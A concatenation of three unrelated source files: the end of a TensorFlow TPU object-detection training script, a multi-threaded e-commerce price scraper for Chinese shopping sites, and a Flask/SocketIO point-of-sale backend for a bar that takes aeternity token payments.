  # `labels`, see the partition logic below.
  # In the TPUEstimator context, the meaning of `shard` and `replica` is the
  # same; following the API, here has mixed use of both.
  if FLAGS.use_spatial_partition:
    # Checks input_partition_dims agrees with num_cores_per_replica.
    if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
      raise RuntimeError('--num_cores_per_replica must be a product of array'
                         'elements in --input_partition_dims.')
    labels_partition_dims = {
        'mean_num_positives': None,
        'source_ids': None,
        'groundtruth_data': None,
        'image_scales': None,
        'image_masks': None,
    }
    # The Input Partition Logic: We partition only the partition-able tensors.
    feat_sizes = utils.get_feat_sizes(
        config.get('image_size'), config.get('max_level'))
    for level in range(config.get('min_level'), config.get('max_level') + 1):
      def _can_partition(spatial_dim):
        # A level is partitionable only if every partition dim divides it.
        partitionable_index = np.where(
            spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
        return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
      spatial_dim = feat_sizes[level]
      if _can_partition(spatial_dim['height']) and _can_partition(
          spatial_dim['width']):
        labels_partition_dims['box_targets_%d' %
                              level] = FLAGS.input_partition_dims
        labels_partition_dims['cls_targets_%d' %
                              level] = FLAGS.input_partition_dims
      else:
        labels_partition_dims['box_targets_%d' % level] = None
        labels_partition_dims['cls_targets_%d' % level] = None
    num_cores_per_replica = FLAGS.num_cores_per_replica
    input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
    num_shards = FLAGS.num_cores // num_cores_per_replica
  else:
    num_cores_per_replica = None
    input_partition_dims = None
    num_shards = FLAGS.num_cores
  # Merged hparams + flag values passed to the model_fn.
  params = dict(
      config.as_dict(),
      model_name=FLAGS.model_name,
      iterations_per_loop=FLAGS.iterations_per_loop,
      model_dir=FLAGS.model_dir,
      num_shards=num_shards,
      num_examples_per_epoch=FLAGS.num_examples_per_epoch,
      strategy=FLAGS.strategy,
      backbone_ckpt=FLAGS.backbone_ckpt,
      ckpt=FLAGS.ckpt,
      val_json_file=FLAGS.val_json_file,
      testdev_dir=FLAGS.testdev_dir,
      profile=FLAGS.profile,
      mode=FLAGS.mode)
  config_proto = tf.ConfigProto(
      allow_soft_placement=True, log_device_placement=False)
  if FLAGS.strategy != 'tpu':
    if FLAGS.use_xla:
      config_proto.graph_options.optimizer_options.global_jit_level = (
          tf.OptimizerOptions.ON_1)
    config_proto.gpu_options.allow_growth = True
  model_dir = FLAGS.model_dir
  model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
  max_instances_per_image = config.max_instances_per_image
  if FLAGS.eval_samples:
    # Ceiling division so all eval samples are covered.
    eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
                     FLAGS.eval_batch_size)
  else:
    eval_steps = None
  total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
  train_steps = total_examples // FLAGS.train_batch_size
  logging.info(params)
  if not tf.io.gfile.exists(model_dir):
    tf.io.gfile.makedirs(model_dir)
  # Snapshot the resolved config next to the checkpoints.
  config_file = os.path.join(model_dir, 'config.yaml')
  if not tf.io.gfile.exists(config_file):
    tf.io.gfile.GFile(config_file, 'w').write(str(config))
  train_input_fn = dataloader.InputReader(
      FLAGS.training_file_pattern,
      is_training=True,
      use_fake_data=FLAGS.use_fake_data,
      max_instances_per_image=max_instances_per_image)
  eval_input_fn = dataloader.InputReader(
      FLAGS.validation_file_pattern,
      is_training=False,
      use_fake_data=FLAGS.use_fake_data,
      max_instances_per_image=max_instances_per_image)
  if FLAGS.strategy == 'tpu':
    tpu_config = tf.estimator.tpu.TPUConfig(
        FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
        num_cores_per_replica=num_cores_per_replica,
        input_partition_dims=input_partition_dims,
        per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
        .PER_HOST_V2)
    run_config = tf.estimator.tpu.RunConfig(
        cluster=tpu_cluster_resolver,
        model_dir=model_dir,
        log_step_count_steps=FLAGS.iterations_per_loop,
        session_config=config_proto,
        tpu_config=tpu_config,
        save_checkpoints_steps=FLAGS.save_checkpoints_steps,
        tf_random_seed=FLAGS.tf_random_seed,
    )
    # TPUEstimator can do both train and eval.
    train_est = tf.estimator.tpu.TPUEstimator(
        model_fn=model_fn_instance,
        train_batch_size=FLAGS.train_batch_size,
        eval_batch_size=FLAGS.eval_batch_size,
        config=run_config,
        params=params)
    eval_est = train_est
  else:
    strategy = None
    if FLAGS.strategy == 'gpus':
      strategy = tf.distribute.MirroredStrategy()
    run_config = tf.estimator.RunConfig(
        model_dir=model_dir,
        train_distribute=strategy,
        log_step_count_steps=FLAGS.iterations_per_loop,
        session_config=config_proto,
        save_checkpoints_steps=FLAGS.save_checkpoints_steps,
        tf_random_seed=FLAGS.tf_random_seed,
    )
    def get_estimator(global_batch_size):
      # Per-replica batch size is derived from the global one.
      params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
      params['batch_size'] = global_batch_size // params['num_shards']
      return tf.estimator.Estimator(
          model_fn=model_fn_instance, config=run_config, params=params)
    # train and eval need different estimator due to different batch size.
    train_est = get_estimator(FLAGS.train_batch_size)
    eval_est = get_estimator(FLAGS.eval_batch_size)
  # start train/eval flow.
  if FLAGS.mode == 'train':
    train_est.train(input_fn=train_input_fn, max_steps=train_steps)
    if FLAGS.eval_after_training:
      eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
  elif FLAGS.mode == 'eval':
    # Run evaluation when there's a new checkpoint
    for ckpt in tf.train.checkpoints_iterator(
        FLAGS.model_dir,
        min_interval_secs=FLAGS.min_eval_interval,
        timeout=FLAGS.eval_timeout):
      logging.info('Starting to evaluate.')
      try:
        eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
        # Terminate eval job when final checkpoint is reached.
        try:
          current_step = int(os.path.basename(ckpt).split('-')[1])
        except IndexError:
          logging.info('%s has no global step info: stop!', ckpt)
          break
        utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
        if current_step >= train_steps:
          logging.info('Eval finished step %d/%d', current_step, train_steps)
          break
      except tf.errors.NotFoundError:
        # Checkpoint might be not already deleted by the time eval finished.
        # We simply skip such case.
        logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
  elif FLAGS.mode == 'train_and_eval':
    # Resume from the latest checkpoint's epoch, if any.
    ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
    try:
      step = int(os.path.basename(ckpt).split('-')[1])
      current_epoch = (
          step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
      logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
    except (IndexError, TypeError):
      logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
      current_epoch = 0
    def run_train_and_eval(e):
      # One epoch of training followed by one evaluation + ckpt archival.
      print('\n =====> Starting training, epoch: %d.' % e)
      train_est.train(
          input_fn=train_input_fn,
          max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
      print('\n =====> Starting evaluation, epoch: %d.' % e)
      eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
      ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
      utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
    epochs_per_cycle = 1 # higher number has less graph construction overhead.
    for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
      if FLAGS.run_epoch_in_child_process:
        # Child process per epoch works around a CPU memory leak.
        p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
        p.start()
        p.join()
        if p.exitcode != 0:
          return p.exitcode
      else:
        run_train_and_eval(e)
  else:
    logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
  # NOTE(review): the file imports `app1` from absl, so `app` is undefined
  # here until that import is corrected to `from absl import app`.
  app.run(main)
|
HTMLInfo.py | import AMZPrice
import BBPrice
import JDPrice
import TMprice
import re
import requests
import sys
import threading
from selenium import webdriver
REFERER = ""
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/58.0.3029.110 Safari/537.36',
'referer': REFERER
}
# Pattern used to strip newlines from config lines and URLs.
line_break_pattern = re.compile('\n')
# Shop-detection patterns. Bug fix: dots are escaped so '.' matches a literal
# dot instead of any character (previously e.g. 'searchXjdXcom' matched JD).
JD = re.compile(r'search\.jd\.com')
AMZ = re.compile(r'www\.amazon\.cn')
TM = re.compile(r's\.taobao\.com')
BB = re.compile(r'd\.beibei\.com')
def get_info_from_jd(item, infolist, driver):
    """Scrape one JD item URL and append its info dict to *infolist*."""
    product = JDPrice.JDPrice(item)
    infolist.append({
        "ICON": "icon/JD.png",
        "URL": item,
        "NAME": product.get_product_name(),
        "PRICE": product.get_product_price(),
        "JPG": product.get_product_jpg(),
        "PROMOTION": product.get_product_promotion(),
    })
def get_info_from_amazon(item, info_list, driver):
    """Scrape one Amazon item URL and append its info dict to *info_list*."""
    product = AMZPrice.AMZPrice(item)
    info_list.append({
        "ICON": "icon/AMZ.png",
        "URL": item,
        "NAME": product.get_product_name(),
        "PRICE": product.get_product_price(),
        "JPG": product.get_product_jpg(),
        "PROMOTION": product.get_product_promotion(),
    })
def get_info_from_tmall(item, infolist, driver):
    """Scrape one Tmall item via the shared selenium *driver*; skip empty results."""
    info = TMprice.TMprice(item).get_info_2dictionary(driver)
    if info:
        info["ICON"] = "icon/TM.jpg"
        infolist.append(info)
def get_info_from_beibei(item, infolist, driver):
    """Scrape one Beibei item URL and append its info dict to *infolist*."""
    product = BBPrice.BBPrice(item)
    infolist.append({
        "ICON": "icon/BB.jpg",
        "URL": item,
        "NAME": product.get_product_name(),
        "PRICE": product.get_product_price(),
        "JPG": product.get_product_jpg(),
        "PROMOTION": product.get_product_promotion(),
    })
def create_jd_url(urls, url_list):
    """Append paginated JD search URLs for every base URL in *urls*."""
    for base in urls:
        JDPrice.JDPrice(base).create_url(url_list)
def create_amazon_url(urls, url_list):
    """Append paginated Amazon search URLs for every base URL in *urls*."""
    for base in urls:
        AMZPrice.AMZPrice(base).create_url(url_list)
def create_tmall_url(urls, url_list):
    """Append paginated Tmall search URLs for every base URL in *urls*."""
    for base in urls:
        TMprice.TMprice(base).create_url(url_list)
def create_beibei_url(urls, url_list):
    """Append paginated Beibei search URLs for every base URL in *urls*."""
    for base in urls:
        BBPrice.BBPrice(base).create_url(url_list)
def get_jd_items(url, item_list):
    """Collect JD item links from one search-result page into *item_list*."""
    JDPrice.JDPrice(url).get_itemlist(item_list)
def get_amazon_items(url, item_list):
    """Collect Amazon item links from one search-result page into *item_list*."""
    AMZPrice.AMZPrice(url).get_item_list(item_list)
def get_tmall_items(url, item_list):
    """Collect Tmall item links from one search-result page into *item_list*."""
    TMprice.TMprice(url).get_item_list(item_list)
def get_beibei_items(url, item_list):
    """Collect Beibei item links from one search-result page into *item_list*."""
    BBPrice.BBPrice(url).get_itemlist(item_list)
# Dispatch tables keyed by shop type ("JD" / "AMZ" / "TM" / "BB").
# Worker callback that scrapes one item URL into an info dict.
CALLBACK = {
    "JD": get_info_from_jd,
    "AMZ": get_info_from_amazon,
    "TM": get_info_from_tmall,
    "BB": get_info_from_beibei,
}
# Collects item URLs from one search-result page.
getTypeItemList = {
    "JD": get_jd_items,
    "AMZ": get_amazon_items,
    "TM": get_tmall_items,
    "BB": get_beibei_items,
}
# Expands base search URLs into paginated URL lists.
createTypeURL = {
    "JD": create_jd_url,
    "AMZ": create_amazon_url,
    "TM": create_tmall_url,
    "BB": create_beibei_url,
}
class HTMLinfo(object):
    """Drives the scraping pipeline for one shop search URL."""

    def __init__(self, url):
        self.url = url
        self.products = []       # product keywords read from cfg/PRODUCT
        self.products_urls = []  # url with 'GOODS' substituted per product
        self.item_list = []      # individual item URLs gathered per page
        self.url_list = []       # paginated search URLs
        self.pages = None
        self.type = None         # one of "JD", "AMZ", "TM", "BB"
        self.data_dict = {}
        self.info_list = []      # scraped info dicts (shared with worker threads)

    def shop(self):
        """Detect the shop type from the URL; exit on unknown hosts."""
        if re.search(JD, self.url):
            self.type = "JD"
        elif re.search(AMZ, self.url):
            self.type = "AMZ"
        elif re.search(TM, self.url):
            self.type = "TM"
        elif re.search(BB, self.url):
            self.type = "BB"
        else:
            print("Error: Wrong type shop!!!")
            sys.exit()

    def multi_process(self):
        """Scrape item info with up to 4 worker threads per batch.

        Tmall scraping needs one shared selenium driver; other shop types
        receive driver=None.
        """
        length = len(self.item_list)
        if self.type == "TM":
            driver = get_web_driver()
            if not driver:
                sys.exit()
            # Need check in my patches to use this function
            # driver.minimize_window()
        else:
            driver = None
        callback = CALLBACK[self.type]
        # Bug fix: the original looked up each batch anchor with
        # item_list.index(i), which returns the *first* occurrence and
        # mis-batches duplicate item URLs. Iterate by index instead, and
        # build each batch of up to 4 threads in one loop.
        for start in range(0, length, 4):
            task_list = [
                threading.Thread(target=callback,
                                 args=(item, self.info_list, driver))
                for item in self.item_list[start:start + 4]
            ]
            for t in task_list:
                t.start()
            for t in task_list:
                t.join()
        if self.type == "TM":
            driver.quit()

    def get_goods(self):
        """Read product keywords (one per line) from cfg/PRODUCT."""
        with open("cfg/PRODUCT", "r", encoding='UTF-8') as f:
            for line in f.readlines():
                product = re.sub(line_break_pattern, '', line)
                self.products.append(product)

    def replace_goods(self):
        """Build one search URL per product by substituting 'GOODS'."""
        goods_pattern = re.compile('GOODS')
        new = re.sub(line_break_pattern, '', self.url)
        self.products_urls = [re.sub(goods_pattern, product, new) for product in self.products]

    def get_items(self):
        """Expand every paginated search URL into individual item URLs."""
        if self.url_list:
            for url in self.url_list:
                getTypeItemList[self.type](url, self.item_list)
        else:
            print("There is no URL links!!")
            sys.exit()

    def create_url(self):
        """Create paginated search URLs for the detected shop type."""
        createTypeURL[self.type](self.products_urls, self.url_list)
def get_web_driver():
    """Try Firefox, then Chrome, then IE; return the first driver that starts.

    :return: a selenium webdriver instance, or None (after printing an error)
        when no supported browser is available.
    """
    # Bug fix: the original used bare ``except:`` clauses, which also swallow
    # KeyboardInterrupt/SystemExit; catch Exception while probing browsers.
    for factory in (webdriver.Firefox, webdriver.Chrome, webdriver.Ie):
        try:
            return factory()
        except Exception:
            continue
    print("Error: Web driver cannot access the browser!")
    return None
def get_html(url):
    """GET *url* with the module-level browser headers.

    :param url: page to fetch
    :return: the requests.Response (30 s timeout; HTTP status not checked here)
    """
    r = requests.get(url, headers=header, timeout=30)
    return r
|
pos.py | #!/usr/bin/env python3
# version 0.2.1-DEV
import os
import sys
import logging
import json
import psycopg2
import psycopg2.extras
from psycopg2.pool import ThreadedConnectionPool
from contextlib import contextmanager
import datetime
import argparse
import threading
from queue import Queue
import time
# flask
from flask import Flask, jsonify, abort
from flask_socketio import SocketIO, emit
# aeternity
from aeternity import Config
from aeternity.signing import KeyPair
from aeternity.epoch import EpochClient
# key signing
from ecdsa import SECP256k1, VerifyingKey
import ecdsa
import base58
import base64
from hashlib import sha256
# also log to stdout because docker
# Root logger at INFO with a timestamped stdout handler so container logs
# capture everything; the chatty aeternity client is raised to WARNING.
root = logging.getLogger()
root.setLevel(logging.INFO)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
formatter = logging.Formatter(
    '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
logging.getLogger("aeternity.epoch").setLevel(logging.WARNING)
# logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
# logging.getLogger("engineio").setLevel(logging.ERROR)
# app secret
flask_secret = os.getenv('APP_SECRET')  # Flask session secret
access_key = os.getenv('POS_ACCESS_KEY')  # shared secret that authorizes POS clients
epoch_node = os.getenv('EPOCH_NODE')  # aeternity epoch node host
bar_wallet_private = os.getenv('WALLET_PRIV')  # bar wallet private key
bar_wallet_address = os.getenv('WALLET_PUB')  # bar wallet public address
BEER_PRICE = 1000  # price of one beer, in token units (see handle_scan)
def fdate(dt):
    """Render *dt* as 'DD/MM/YYYY – HH:MM:SS' (en dash separator)."""
    return format(dt, '%d/%m/%Y – %H:%M:%S')
def authorize(request_key):
    """Return True when *request_key* matches the configured POS access key.

    :param request_key: key supplied by the connecting client
    """
    # Idiom: direct comparison instead of an if/return True/return False chain.
    return request_key == access_key
def reload_settings():
    """Re-read every configuration global from the environment.

    Mutates the module-level settings in place so a running process can pick
    up changed env vars without a restart.
    """
    logging.info("reloading settings")
    # Database connection settings.
    global pg_host
    pg_host = os.getenv('POSTGRES_HOST')
    global pg_user
    pg_user = os.getenv('POSTGRES_USER')
    global pg_pass
    pg_pass = os.getenv('POSTGRES_PASSWORD')
    global pg_db
    pg_db = os.getenv('POSTGRES_DB')
    global pg_schema
    pg_schema = 'public'
    # app secret
    global flask_secret
    flask_secret = os.getenv('APP_SECRET')
    global access_key
    access_key = os.getenv('POS_ACCESS_KEY')
    global epoch_node
    epoch_node = os.getenv('EPOCH_NODE')
    global bar_wallet_private
    bar_wallet_private = os.getenv('WALLET_PRIV')
    global bar_wallet_address
    bar_wallet_address = os.getenv('WALLET_PUB')
# ______ ______
# |_ _ `.|_ _ \
# | | `. \ | |_) |
# | | | | | __'.
# _| |_.' /_| |__) |
# |______.'|_______/
#
class PG(object):
    """Thin wrapper around a psycopg2 ThreadedConnectionPool."""
    def __init__(self, host, user, password, database, poolsize=10):
        # Build a libpq DSN and a pool of 1..poolsize connections.
        connect_str = "dbname='{}' user='{}' host='{}' password='{}'".format(
            database, user, host, password)
        self.pool = ThreadedConnectionPool(1, poolsize, dsn=connect_str)
    @contextmanager
    def getcursor(self):
        """Yield a DictCursor from a pooled connection.

        NOTE(review): the connection is committed in ``finally``, i.e. even
        when the block raised — confirm this best-effort commit is intended.
        """
        con = self.pool.getconn()
        try:
            yield con.cursor(cursor_factory=psycopg2.extras.DictCursor)
        finally:
            con.commit()
            self.pool.putconn(con)
    def execute(self, query, params=()):
        """run a database update
        :param query: the query string
        :param params: the query parameteres

        Errors are logged and swallowed (best-effort write).
        """
        with self.getcursor() as c:
            try:
                c.execute(query, params)
            except Exception as e:
                logging.error(e)
    def select(self, query, params=(), many=False):
        """
        run a database update
        :param query: the query string
        :param params: the query parameteres
        :param many: when True return all rows, otherwise a single row

        Returns None when the query fails (the error is only logged).
        """
        with self.getcursor() as c:
            try:
                # Insert a row of data
                c.execute(query, params)
                if many:
                    return c.fetchall()
                else:
                    return c.fetchone()
            except Exception as e:
                logging.error(e)
# ______ ____ ____ _ _____ ____ _____
# .' ___ ||_ || _| / \ |_ _||_ \|_ _|
# / .' \_| | |__| | / _ \ | | | \ | |
# | | | __ | / ___ \ | | | |\ \| |
# \ `.___.'\ _| | | |_ _/ / \ \_ _| |_ _| |_\ |_
# `.____ .'|____||____||____| |____||_____||_____|\____|
#
def get_aeternity():
    """get the epoch client and the genesis keypair from config

    :return: (EpochClient, KeyPair) built from the module-level env settings
    """
    # configure epoch client in case we need it
    epoch = EpochClient(configs=Config(
        external_host=epoch_node,
        internal_host=f"{epoch_node}/internal",
        secure_connection=True
    ))
    logging.info(f"using node at {epoch_node}")
    # load the genesis keypair
    gp = bar_wallet_address
    gk = bar_wallet_private
    main_wallet = KeyPair.from_public_private_key_strings(gp, gk)
    return epoch, main_wallet
def verify_signature(sender, signature_b64, message):
    """
    :param sender: the sender address
    :param signature_b64: signature
    :param message: message
    :return: True iff the DER-encoded ECDSA signature over *message* verifies
        against the sender's SECP256k1 public key; any failure yields False
    """
    verified = False
    try:
        signature = base64.b64decode(signature_b64)
        # Drop the 3-char address prefix before base58check-decoding
        # (presumably an 'ak$'-style scheme tag — TODO confirm).
        sender_pub = base58.b58decode_check(sender[3:])
        logging.debug(
            f"sign sender: {sender_pub} signature {signature} tx: {message}")
        # The first decoded byte is skipped (presumably a key-type tag —
        # TODO confirm against the aeternity key format).
        vk = VerifyingKey.from_string(
            sender_pub[1:], curve=SECP256k1, hashfunc=sha256)
        verified = vk.verify(signature, bytearray(message, 'utf-8'), sigdecode=ecdsa.util.sigdecode_der)
    except Exception:
        # Any decode/verify error is treated as an invalid signature.
        verified = False
    logging.debug(
        "sign sender: '{}' signature '{}' tx: {}, verified {}".format(
            sender, signature_b64, message, verified
        )
    )
    return verified
# ______ ___ ______ ___ ____ ________ _________ _ ___
# .' ____ \ .' `. .' ___ ||_ ||_ _| |_ __ || _ _ |(_) .' `.
# | (___ \_|/ .-. \/ .' \_| | |_/ / | |_ \_||_/ | | \_|__ / .-. \
# _.____`. | | | || | | __'. | _| _ | | [ || | | |
# | \____) |\ `-' /\ `.___.'\ _| | \ \_ _| |__/ | _| |_ | |\ `-' /
# \______.' `.___.' `.____ .'|____||____||________| |_____| [___]`.___.'
#
# SocketIO is created unbound; presumably initialized with the app elsewhere.
socketio = SocketIO()
app = Flask(__name__)
# NOTE(review): addHandler() expects a logging.Handler, but app.logger is a
# Logger. This only works incidentally (Logger also has .handle) — confirm.
root.addHandler(app.logger)
@socketio.on('scan')
def handle_scan(access_key, tx_hash, tx_signature):
    """Validate a scanned payment transaction and mark it as used.

    :param access_key: client-supplied key. NOTE(review): unlike
        handle_refund, it is never checked here — confirm whether
        authorization was intended.
    :param tx_hash: hash of the payment transaction to redeem
    :param tx_signature: base64 signature over tx_hash by the tx sender
    :return: reply dict with tx_hash, success flag and a human message
    """
    # query the transactions
    global cash_register
    try:
        tx = cash_register.query_tx(tx_hash)
        if tx is None:
            # transaction not found
            reply = {
                "tx_hash": tx_hash,
                "success": False,
                "msg": f"Transaction {tx_hash} doesn't exists"
            }
            return reply
        # tx has been already validated
        if tx['scanned_at'] is not None:
            reply = {
                "tx_hash": tx_hash,
                "success": False,
                "msg": f"Transaction already executed at {fdate(tx['scanned_at'])}"
            }
            return reply
        if tx['amount'] < BEER_PRICE:
            reply = {
                "tx_hash": tx_hash,
                "success": False,
                "msg": f"Amount {tx['amount']} not enough, required {BEER_PRICE}"
            }
            return reply
        # verify_signature
        logging.debug(f"sign sender: {tx['sender']} signature {tx_signature} tx: {tx_hash}")
        valid = verify_signature(tx['sender'], tx_signature, tx_hash)
        if not valid:
            # transaction is not valid
            reply = {
                "tx_hash": tx_hash,
                "success": False,
                "msg": f"Transaction signature mismatch"
            }
            return reply
        # transaction is good
        # update the record
        now = datetime.datetime.now()
        database.execute(
            'update transactions set tx_signature=%s, scanned_at = %s where tx_hash = %s',
            (tx_signature, now, tx_hash)
        )
        # get the wallet name
        wallet_name = tx['sender']
        row = database.select("select wallet_name from names where public_key = %s", (tx['sender'],))
        if row is not None:
            wallet_name = row['wallet_name']
        # reply
        beer_count = "{:.0f}".format(tx['amount'] / BEER_PRICE)
        reply = {
            "tx_hash": tx_hash,
            "success": True,
            "msg": f"Success! Serve {beer_count} beer(s) to {wallet_name} [amount {tx['amount']}]"
        }
    except Exception as e:
        # Catch-all so the socket handler always returns a reply dict.
        logging.error(f"transaction scan {tx_hash} error {e}")
        reply = {
            "tx_hash": tx_hash,
            "success": False,
            "msg": f"Error! ask for help!"
        }
    return reply
@socketio.on('was_beer_scanned')
def handle_was_beer_scanned(tx_hash):
    """check if the trasaction was scanned

    :param tx_hash: hash of the transaction to look up
    :return: {"scanned": bool, "scanned_at": str timestamp or None}
    """
    tx = database.select(
        "select * from transactions where tx_hash = %s", (tx_hash,))
    reply = {"scanned": False, "scanned_at": None}
    # Unknown or never-scanned transactions both report scanned=False.
    if tx is None:
        return reply
    if tx['scanned_at'] is not None:
        reply = {
            "scanned": True,
            "scanned_at": str(tx['scanned_at'])
        }
    return reply
@socketio.on('refund')
def handle_refund(access_key, wallet_address, amount):
    """
    refund an account from the bar account
    :param access_key: the shared secret to authenticate the pos
    :param wallet_address: the account to refund
    :param amount: the amount to move (coerced via int())
    :return: reply dict with success flag, tx_hash and a human message
    """
    reply = {"success": False, "tx_hash": None, "msg": None}
    # check the authorization
    if not authorize(access_key):
        msg = f"Unauthorized access for key '{access_key}'"
        logging.error(f"refund: {msg}")
        reply['msg'] = msg
        return reply
    # run the refund
    # NOTE(review): epoch / bar_wallet / database are module globals
    # presumably initialized at startup — not visible in this section.
    try:
        logging.debug(
            "from '{}', to '{}', amount '{}'".format(
                bar_wallet.get_address(), wallet_address, amount)
        )
        _, tx_hash = epoch.spend(keypair=bar_wallet,
                                 recipient_pubkey=wallet_address,
                                 amount=int(amount))
        wallet_name = wallet_address
        row = database.select("select wallet_name from names where public_key = %s", (wallet_address,))
        if row is not None:
            wallet_name = row['wallet_name']
        reply = {
            "success": True,
            "tx_hash": tx_hash,
            "msg": f"Success! Refunded {amount} aet to {wallet_name}"
        }
    except Exception as e:
        # Any spend failure is reported back as the reply message.
        reply['msg'] = str(e)
    return reply
@socketio.on('set_bar_state')
def handle_set_bar_state(access_key, state):
    """
    Change the bar state and broadcast it to every connected client.

    :param access_key: the shared secret to authenticate the pos
    :param state: one of 'open', 'closed', 'out_of_beers'
    :return: reply dict with "success" and "msg"
    """
    reply = {"success": False, "msg": None}
    # check the authorization
    if not authorize(access_key):
        reply['msg'] = f"Unauthorized access using key {access_key}, state {state}"
        logging.error(reply['msg'])
        return reply
    # run the update
    valid_states = ['open', 'closed', 'out_of_beers']
    if state in valid_states:
        database.execute("update state set state = %s, updated_at = NOW()", (state,))
        # broadcast the new status to all clients
        emit('bar_state', {"state": state}, broadcast=True)
        logging.info(f"set_bar_state: new state {state}")
        reply = {"success": True, "msg": state}
    else:
        # fix: the message used to read "Invalid invalid state ..."
        msg = f"Invalid state {state}, allowed {','.join(valid_states)}"
        logging.error(msg)
        reply = {
            "success": False,
            "msg": msg
        }
    # reply to the sender
    return reply
@socketio.on('reset_bar')
def handle_reset_bar(access_key):
    """Reset the locally tracked chain height so polling restarts from block 0."""
    reply = {"success": False, "msg": None}
    # check the authorization
    if not authorize(access_key):
        reply['msg'] = f"Unauthorized access using key {access_key}"
        logging.error(reply['msg'])
        return reply
    logging.info("RESET CHAINHEIGHT IN MIDDLEWARE DATABASE")
    database.execute("update pos_height set block_id = %s", (0,))
    # reply to the sender
    return {"success": True, "msg": "chain reset"}
@socketio.on('get_bar_state')
def handle_get_bar_state():
    """Reply to a bar-state request with the state stored in the database."""
    record = database.select('select state from state limit 1')
    return {"state": record['state']}
@socketio.on('get_name')
def handle_get_name(public_key):
    """Reverse-map a public key to its registered wallet name (None if unknown)."""
    record = database.select(
        'select wallet_name from names where public_key = %s', (public_key,))
    name = record['wallet_name'] if record is not None else None
    return {'name': name}
@app.after_request
def after_request(response):
    """Enable CORS by allowing any origin on every outgoing response."""
    response.headers['Access-Control-Allow-Origin'] = '*'
    return response
@app.route('/rest/name/<public_key>')
def rest_get_name(public_key):
    """REST endpoint: reverse-map a public key to its wallet name; 404 if unknown."""
    row = database.select('select wallet_name from names where public_key = %s', (public_key,))
    if row is None:
        abort(404)
    return jsonify({"name": row['wallet_name']})
# global db variable
# Populated by cmd_start() with a PG connection before the app serves requests;
# every handler above reads it, so it must be initialised before socketio.run().
database = None
# ____ ____ ___ _______ ___ ____ ________ _______
# |_ _| |_ _|.' `.|_ __ \ |_ ||_ _| |_ __ ||_ __ \
# \ \ /\ / / / .-. \ | |__) | | |_/ / | |_ \_| | |__) |
# \ \/ \/ / | | | | | __ / | __'. | _| _ | __ /
# \ /\ / \ `-' /_| | \ \_ _| | \ \_ _| |__/ | _| | \ \_
# \/ \/ `.___.'|____| |___||____||____||________||____| |___|
#
class CashRegisterPoller(object):
    """
    Poll the bar account on the chain and record matching spend transactions
    in the local database.
    """

    def __init__(self, db, epoch, bar_wallet, orders_queue, interval=15):
        """Constructor

        :type db: PG
        :param db: object for database connection
        :type epoch: EpochClient
        :param epoch: client to interact with the chain
        :type bar_wallet: KeyPair
        :param bar_wallet: contains the bar wallet
        :type orders_queue: Queue
        :param orders_queue: orders chain queue
        :type interval: int
        :param interval: check interval, in seconds
        """
        self.interval = interval
        self.db = db
        self.epoch = epoch
        self.bar_wallet = bar_wallet
        self.orders_queue = orders_queue

    def start(self):
        """Start the polling loop in a background daemon thread."""
        thread = threading.Thread(target=self.run, args=())
        thread.daemon = True  # daemonize so it won't block interpreter exit
        thread.start()

    def run(self):
        """Poll forever: first iteration runs immediately, then every self.interval seconds."""
        interval = 0
        while True:
            # sleep at the beginning so the first poll is immediate
            time.sleep(interval)
            interval = self.interval
            self.poll()

    def query_tx(self, tx_hash):
        """Get a transaction from the database, or None if it's not found.

        If the hash is unknown locally, poll the chain once for it and retry.
        """
        q, p = "select * from transactions where tx_hash = %s", (tx_hash,)
        tx = self.db.select(q, p)
        if tx is None:
            self.poll_tx(tx_hash)
            tx = self.db.select(q, p)
        logging.debug(tx)
        return tx

    def insert_tx(self, block_id, pos_tx, recipient):
        """Insert a transaction in the database if it matches the bar account."""
        if recipient == self.bar_wallet.get_address():
            logging.info(f"FOUND BAR TRANSACTION {pos_tx[0]}")
            # insert block (idempotent thanks to the on-conflict clause)
            self.db.execute('insert into blocks(height) values (%s) on conflict(height) do nothing',
                            (block_id,))
            # record transaction
            self.db.execute('''insert into transactions (tx_hash, sender, amount, block_id, found_at)
values (%s,%s,%s,%s,%s) on conflict(tx_hash) do nothing''',
                            pos_tx)

    def poll_tx(self, tx_hash):
        """Poll the chain for one specific transaction and store it if relevant.

        Re-raises any lookup error after logging it, so callers can react.
        """
        try:
            tx = self.epoch.get_transaction_by_transaction_hash(tx_hash)
            block_id = tx.block_height
            recipient = tx.tx.recipient
            pos_tx = (
                tx.hash,
                tx.tx.sender,
                tx.tx.amount,
                block_id,
                datetime.datetime.now()
            )
            self.insert_tx(block_id, pos_tx, recipient)
        except Exception as e:
            logging.info(f"transaction {tx_hash} lookup error {e}")
            raise  # bare raise preserves the original traceback (was: raise e)

    def poll(self):
        """Scan blocks added since the last recorded height for spend transactions."""
        try:
            logging.info('polling chain...')
